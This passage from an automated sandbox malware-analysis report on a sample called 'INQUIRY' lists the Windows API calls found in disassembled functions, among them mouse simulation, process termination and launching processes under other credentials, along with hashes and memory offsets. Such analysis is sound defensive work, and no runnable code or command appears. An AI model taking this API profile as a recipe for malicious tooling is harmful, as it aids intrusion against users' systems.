                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: b21620284c6524716b13600f3c1ef2f1c1a2538b213976324dd918ae44255efc
                                                                                              • Instruction ID: 870e2d558c1b12aed66b6e4fffbcdc0856ca763c53787c7f309b602e01054559
                                                                                              • Opcode Fuzzy Hash: b21620284c6524716b13600f3c1ef2f1c1a2538b213976324dd918ae44255efc
                                                                                              • Instruction Fuzzy Hash: 5B416634701240AFDF25CFA4E599B947BE1FF85310F1842B9F9489F6A2CB31A856CB61
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00A84E41,?,?,00000000,00000001), ref: 00A870AC
                                                                                                • Part of subcall function 00A839A0: GetWindowRect.USER32(?,?), ref: 00A839B3
                                                                                              • GetDesktopWindow.USER32 ref: 00A870D6
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A870DD
                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A8710F
                                                                                                • Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
                                                                                              • GetCursorPos.USER32(?), ref: 00A8713B
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A87199
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                              • String ID:
                                                                                              • API String ID: 4137160315-0
                                                                                              • Opcode ID: b55e3e6e0dd7660d8db6eb20ed3c4d702ae7af635a004fd9083f3b52e49592e7
                                                                                              • Instruction ID: f2cffe2622999e03248cd8e36d1179cd1f96d88391901135a90272ba7f960012
                                                                                              • Opcode Fuzzy Hash: b55e3e6e0dd7660d8db6eb20ed3c4d702ae7af635a004fd9083f3b52e49592e7
                                                                                              • Instruction Fuzzy Hash: 5A31A372605305AFD720EF54DC49A9FB7A9FF88314F10051AF58997191CB74EA05CB92
                                                                                              APIs
                                                                                                • Part of subcall function 00A680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A680C0
                                                                                                • Part of subcall function 00A680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A680CA
                                                                                                • Part of subcall function 00A680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A680D9
                                                                                                • Part of subcall function 00A680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A680E0
                                                                                                • Part of subcall function 00A680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A680F6
                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00A6842F), ref: 00A688CA
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A688D6
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A688DD
                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A688F6
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00A6842F), ref: 00A6890A
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A68911
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                              • String ID:
                                                                                              • API String ID: 3008561057-0
                                                                                              • Opcode ID: a81229fc1620534544a8bf07520a4654aa442c5323d95423e75541b14711ffac
                                                                                              • Instruction ID: 91fbf825bdc665cd62ff4ecd329c49379c79dd5a07b207ab1575e8bbe5cde196
                                                                                              • Opcode Fuzzy Hash: a81229fc1620534544a8bf07520a4654aa442c5323d95423e75541b14711ffac
                                                                                              • Instruction Fuzzy Hash: 0F119D72601209EFDB10DBE4DC09BBE777CEB45311F204229E995D7110DB3A9911DB60
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A685E2
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A685E9
                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A685F8
                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00A68603
                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A68632
                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A68646
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                              • String ID:
                                                                                              • API String ID: 1413079979-0
                                                                                              • Opcode ID: 9382b83447d0472cff66512c5a1eae49469c5bd6adff9aa9ce3322228cf889e1
                                                                                              • Instruction ID: 63dbf28e0eac900819e19b3315d48321264bb597f5fea592d4cc3983908b0021
                                                                                              • Opcode Fuzzy Hash: 9382b83447d0472cff66512c5a1eae49469c5bd6adff9aa9ce3322228cf889e1
                                                                                              • Instruction Fuzzy Hash: D6114776600249AFDF01CFE8DD49BDA7BBDEB08344F044165FE05A2160DA768E61AB60
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00A6B7B5
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A6B7C6
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A6B7CD
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A6B7D5
                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A6B7EC
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00A6B7FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: d1bb53e3451d892ac6f9166184fd496fc19cf239fd8c73f406cd6c0bf7be6ee5
                                                                                              • Instruction ID: bcf348c09f6a32a92121b02fd218389c4cbeacbc22c95d702e9e655de29a0058
                                                                                              • Opcode Fuzzy Hash: d1bb53e3451d892ac6f9166184fd496fc19cf239fd8c73f406cd6c0bf7be6ee5
                                                                                              • Instruction Fuzzy Hash: 6D018475E00309BFEB109BE69D45A5EBFB8EB48311F104076FA04E7291DA309C11CFA0
                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A30193
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A3019B
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A301A6
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A301B1
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A301B9
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A301C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: 8b50999612536d084d99b6e0d2ad88fd1e76f8b3473e980c53ebd0e2d0261573
                                                                                              • Instruction ID: 8571afdef0a435f469f09d3a0592aab2ea2de060ea2597868992f5cd24c25936
                                                                                              • Opcode Fuzzy Hash: 8b50999612536d084d99b6e0d2ad88fd1e76f8b3473e980c53ebd0e2d0261573
                                                                                              • Instruction Fuzzy Hash: FE016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C8B941C7F5A864CBE5
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A753F9
                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A7540F
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00A7541E
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7542D
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A75437
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7543E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 839392675-0
                                                                                              • Opcode ID: b885656995a7bb2025402458b65bec3fdb45e26564ce461694dc02e6f927200a
                                                                                              • Instruction ID: 3fa0b417e31ee0148d0fe867c3f1d9aee0fd08c2918ead875099120f4a09d707
                                                                                              • Opcode Fuzzy Hash: b885656995a7bb2025402458b65bec3fdb45e26564ce461694dc02e6f927200a
                                                                                              • Instruction Fuzzy Hash: 57F01D32641658BFE7219BA29C0DEAF7A7CEBC6B11F00016AFA05D10519AA51A4286B5
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00A77243
                                                                                              • EnterCriticalSection.KERNEL32(?,?,00A20EE4,?,?), ref: 00A77254
                                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00A20EE4,?,?), ref: 00A77261
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A20EE4,?,?), ref: 00A7726E
                                                                                                • Part of subcall function 00A76C35: CloseHandle.KERNEL32(00000000,?,00A7727B,?,00A20EE4,?,?), ref: 00A76C3F
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A77281
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00A20EE4,?,?), ref: 00A77288
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: a032b9657c9c268578b36b7d528394177211636460a161dbf838e393fdb48c05
                                                                                              • Instruction ID: 8c1dfec548127b6497472bbd1fadc8f87e5a13d326609f0038f3f07f8b111113
                                                                                              • Opcode Fuzzy Hash: a032b9657c9c268578b36b7d528394177211636460a161dbf838e393fdb48c05
                                                                                              • Instruction Fuzzy Hash: 23F05E76640612EFDB125BA4ED4CADF7729EF55702B204633F603D10A1CF766812CB90
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A6899D
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00A689A9
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A689B2
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A689BA
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A689C3
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A689CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: dde481d8d359a3831b8a09ea1ab353fde0c88d5038f54a51d747f7786c7c3c75
                                                                                              • Instruction ID: b87b868f65ef464f00875746a5eb77f1e94c91d45b22da51660a4200e809ec4c
                                                                                              • Opcode Fuzzy Hash: dde481d8d359a3831b8a09ea1ab353fde0c88d5038f54a51d747f7786c7c3c75
                                                                                              • Instruction Fuzzy Hash: A0E0527A204505FFDA019FF5EC0C95ABB69FB89762B608632F329C5470CF369462DB90
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A88613
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A88722
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A8889A
                                                                                                • Part of subcall function 00A77562: VariantInit.OLEAUT32(00000000), ref: 00A775A2
                                                                                                • Part of subcall function 00A77562: VariantCopy.OLEAUT32(00000000,?), ref: 00A775AB
                                                                                                • Part of subcall function 00A77562: VariantClear.OLEAUT32(00000000), ref: 00A775B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4237274167-1221869570
                                                                                              • Opcode ID: c125e6b525a8407c332bf42f087520816dbe3f65ee6e86175c48515ed33f9de7
                                                                                              • Instruction ID: 0afcb79d8ebf189f7fb98c874b05d56cbbfdb4ad47b189ef5872c4d9a8194b21
                                                                                              • Opcode Fuzzy Hash: c125e6b525a8407c332bf42f087520816dbe3f65ee6e86175c48515ed33f9de7
                                                                                              • Instruction Fuzzy Hash: 2A917A74A083019FCB10EF24C58495BBBF4EF89754F54892EF88A8B361DB35E945CB92
                                                                                              APIs
                                                                                                • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
                                                                                              • _memset.LIBCMT ref: 00A72B87
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A72BB6
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A72C69
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A72C97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                              • String ID: 0
                                                                                              • API String ID: 4152858687-4108050209
                                                                                              • Opcode ID: f576af1ab69d25ce2250522af12713d4117c2125a037a0bbdd495666f14e6857
                                                                                              • Instruction ID: e150288f5f07de9e1b36cf680eb8f566b023e75cfc9fc982405a1f726cb211e3
                                                                                              • Opcode Fuzzy Hash: f576af1ab69d25ce2250522af12713d4117c2125a037a0bbdd495666f14e6857
                                                                                              • Instruction Fuzzy Hash: 5551CC716083019ED7269F28DC45B6FB7E8EBA8350F14CA2EF899D2291DB70CD449752
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6D5D4
                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A6D60A
                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A6D61B
                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A6D69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                              • String ID: DllGetClassObject
                                                                                              • API String ID: 753597075-1075368562
                                                                                              • Opcode ID: 1b18fa13f58d21f1d45fcd395e1b24cfa6c65ab241a13e639be9bf81e28799be
                                                                                              • Instruction ID: 78415c50db04c51aa440981c0f4afc4d0f6695b4e691c8f7812cc4164e72a65a
                                                                                              • Opcode Fuzzy Hash: 1b18fa13f58d21f1d45fcd395e1b24cfa6c65ab241a13e639be9bf81e28799be
                                                                                              • Instruction Fuzzy Hash: 2E418EB5B10204EFDB05CF64C884B9A7BB9EF44350F1581AAED09DF205D7B1D940DBA0
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A727C0
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A727DC
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00A72822
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AD5890,00000000), ref: 00A7286B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1173514356-4108050209
                                                                                              • Opcode ID: e821ae8bb46e7d48c40d626640eea7a23e4467e733bd83192d2aaf0d447d6bc6
                                                                                              • Instruction ID: 63ad49830e2acc6652980732db1768e6d5f8ba1d8459f9ce85fd8dad3cad6dc1
                                                                                              • Opcode Fuzzy Hash: e821ae8bb46e7d48c40d626640eea7a23e4467e733bd83192d2aaf0d447d6bc6
                                                                                              • Instruction Fuzzy Hash: 3C418E702043419FD724DF25DC44B5ABBE8EF85314F14C92EF9A997292DB31A905CB53
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A8D7C5
                                                                                                • Part of subcall function 00A1784B: _memmove.LIBCMT ref: 00A17899
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower_memmove
                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                              • API String ID: 3425801089-567219261
                                                                                              • Opcode ID: 33632a1fd3e490330506b1996f3e8af6bd3223f647f86e9278de9256a00f94d0
                                                                                              • Instruction ID: c6c80e67054e9ccd758a2d4db6932cd8c6963e10cf356ad035b9759e235f561d
                                                                                              • Opcode Fuzzy Hash: 33632a1fd3e490330506b1996f3e8af6bd3223f647f86e9278de9256a00f94d0
                                                                                              • Instruction Fuzzy Hash: F931AD71904619AFCF00EF68C955DEEB3B4FF04320F108A29E825AB6D1DB31AD05CB80
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A68F14
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A68F27
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A68F57
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 365058703-1403004172
                                                                                              • Opcode ID: 3bf5d691ab62327d874f95b9d986977be55f0acb7fff1163f50420c1077177cc
                                                                                              • Instruction ID: b13d062304a12d3430982728f069f6d7a7a020f66399675a7550b9dfadc7bcd2
